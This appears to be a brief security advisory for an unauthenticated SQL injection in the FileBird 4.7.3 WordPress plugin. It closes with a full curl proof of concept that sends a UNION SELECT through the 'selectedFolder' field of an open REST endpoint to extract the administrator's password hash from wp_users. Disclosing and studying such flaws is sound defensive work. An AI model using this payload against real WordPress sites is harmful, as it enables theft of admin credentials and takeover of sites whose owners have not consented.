Filebird 4.7.3 - Unauthenticated SQL Injection

The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user.

PoC

curl ‘https://example.com/wp-json/filebird/v1/gutenberg-get-images?_locale=user’ \ -H ‘accept: application/json, /;q=0.1’ \ -H ‘accept-language: en-GB,en-US;q=0.9,en;q=0.8’ \ -H ‘content-type: application/json’ \ --data-raw ‘{“isLoading”:false,“captions”:{},“imagesRemoved”:[],“images”:[],“selectedFolder”:[“1) UNION (SELECT user_pass FROM wp_users WHERE ID=1”],“columns”:3,“isCropped”:true,“hasCaption”:false,“linkTo”:“none”,“sortBy”:“date”,“sortType”:“DESC”,“animation”:“none”,“animationEasing”:“linear”,“animationDelay”:0,“animationDuration”:400,“folders”:[{“value”:0,“label”:“Please choose folder”,“disabled”:true}]}’ \ --compressed